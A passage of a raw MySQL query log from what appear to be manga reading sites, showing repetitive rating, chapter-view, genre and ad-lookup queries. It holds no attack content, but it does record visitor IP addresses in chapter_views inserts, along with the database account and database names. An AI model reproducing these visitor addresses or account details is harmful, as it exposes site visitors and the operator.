created desc 330641905 Quit 330641906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330641906 Quit 330641907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330641907 Quit 330641908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330641908 Quit 330641909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330641909 Quit 330641910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330641910 Quit 330641911 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330641911 Quit 330641912 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330641912 Quit 330641913 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330641913 Quit 330641914 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330641914 Quit 330641915 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330641915 Quit 330641916 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330641916 Quit 330641917 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330641917 Quit 330641918 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330641918 Quit 330641919 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330641919 Quit 330641920 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330641920 Quit 330641921 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330641921 Quit 330641922 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330641922 Quit 330641923 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330641923 Quit 330641924 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330641924 Quit 330641925 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330641925 Quit 330641926 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330641926 Quit 330641927 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330641927 Quit 330641928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330641928 Quit 330641929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330641929 Quit 330641930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330641930 Quit 330641931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330641931 Quit 330641932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330641932 Quit 330641933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330641933 Quit 330641934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330641934 Quit 330641935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330641935 Quit 330641936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330641936 Quit 330641937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330641937 Quit 330641938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330641938 Quit 330641939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330641939 Quit 330641940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330641940 Quit 330641941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330641941 Quit 330641942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330641942 Quit 330641943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330641943 Quit 330641944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330641944 Quit 330641945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330641945 Quit 330641946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330641946 Quit 330641947 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330641947 Quit 330641948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330641948 Quit 330641949 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330641949 Quit 330641950 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330641950 Quit 330641951 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330641951 Quit 330641952 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330641952 Quit 330641953 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330641953 Quit 330641954 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330641954 Quit 330641955 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330641955 Quit 330641956 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330641956 Quit 330641957 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330641957 Quit 330641958 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330641958 Quit 330641959 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330641959 Quit 330641960 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330641960 Quit 330641961 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641962 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641961 Quit 330641962 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641962 Quit 330641963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641963 Quit 330641964 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17874' 330641964 Quit 330641965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641965 Query select * FROM chapters where id = '17874' 330641965 Quit 330641966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641966 Query select * FROM chapters where manga_id = '376' order by id desc 330641966 Quit 330641967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641967 Query Update chapters set view=view+1 where id = '17874' 330641967 Quit 330641968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641968 Query select * FROM chapters where id = '17874' 330641968 Quit 330641969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641969 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17874' 330641969 Quit 330641970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641970 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('376', '17874', '216.244.66.235', 'mangacherri.com', '2026-02-26 03:28:09', '2026-02-26 03:28:09') 330641970 Quit 330641971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641971 Query select * FROM chapter_images where chapter_id = '17874' 330641971 Quit 330641972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641972 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '376' and m.active = 1 330641972 Quit 330641973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641973 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='376' and m.active = 1 AND (genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Josei%' OR genres like '%Manhwa%' OR genres like '%Mystery%' OR genres like '%Romance%') ORDER BY RAND() limit 10 330641681 Quit 330641974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641974 Quit 330641975 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641975 Quit 330641976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641976 Quit 330641977 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641977 Quit 330641978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641978 Quit 330641979 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641979 Quit 330641980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641980 Quit 330641981 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641981 Quit 260225 19:28:10 330641973 Quit 330641982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641982 Quit 330641983 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641983 Quit 330641984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641984 Quit 330641985 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641985 Quit 330641986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641986 Quit 330641987 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641987 Quit 330641988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641988 Quit 330641989 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641989 Quit 330641990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641990 Quit 330641991 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12505' 330641991 Quit 330641992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641992 Query select * FROM chapters where id = '12505' 330641992 Quit 330641993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641993 Query select * FROM chapters where manga_id = '239' order by id desc 330641993 Quit 330641994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641994 Query Update chapters set view=view+1 where id = '12505' 330641994 Quit 330641995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641995 Query select * FROM chapters where id = '12505' 330641995 Quit 330641996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641996 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12505' 330641997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641997 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12505', '2001:550:9801:671e:3921:2f2d:2800:604c', 'mangacherri.com', '2026-02-26 03:28:10', '2026-02-26 03:28:10') 330641996 Quit 330641997 Quit 330641998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641998 Query select * FROM chapter_images where chapter_id = '12505' 330641998 Quit 330641999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641999 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330641999 Quit 330642000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642000 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330642001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642001 Quit 330642002 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 260225 19:28:11 330642000 Quit 330642003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642004 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642003 Quit 330642004 Quit 330642005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642005 Quit 330642006 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642006 Quit 330642007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642007 Quit 330642008 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642008 Quit 330642009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642009 Quit 330642010 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642010 Quit 330642002 Quit 330642011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642011 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330642011 Quit 330642012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642012 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330642012 Quit 330642013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642013 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330642014 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642015 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642014 Quit 330642015 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Shounen%' and m.active=1) as k where latest_chapter_id > 0 330642015 Quit 330642016 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642016 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.active= 1 and m.genres like '%Shounen%' group by manga_id ORDER BY sum(view) DESC 330642016 Quit 330642017 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642018 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642017 Quit 330642018 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642018 Quit 330642019 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330642019 Quit 330642020 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330642020 Quit 330642021 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330642021 Quit 330642022 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330642022 Quit 330642023 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330642023 Quit 330642024 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330642024 Quit 330642025 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330642025 Quit 330642026 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330642026 Quit 330642027 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330642027 Quit 330642028 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330642028 Quit 330642029 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330642029 Quit 330642030 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330642030 Quit 330642031 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330642031 Quit 330642032 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330642032 Quit 330642033 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330642033 Quit 330642034 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330642034 Quit 330642035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330642035 Quit 330642036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330642036 Quit 330642037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330642037 Quit 330642038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330642038 Quit 330642039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330642039 Quit 330642040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330642040 Quit 330642041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330642041 Quit 330642042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330642042 Quit 330642043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330642043 Quit 330642044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330642044 Quit 330642045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330642045 Quit 330642046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330642046 Quit 330642047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330642047 Quit 330642048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330642048 Quit 330642049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330642049 Quit 330642050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330642050 Quit 330642051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330642051 Quit 330642052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330642052 Quit 330642053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330642053 Quit 330642054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330642054 Quit 330642055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where 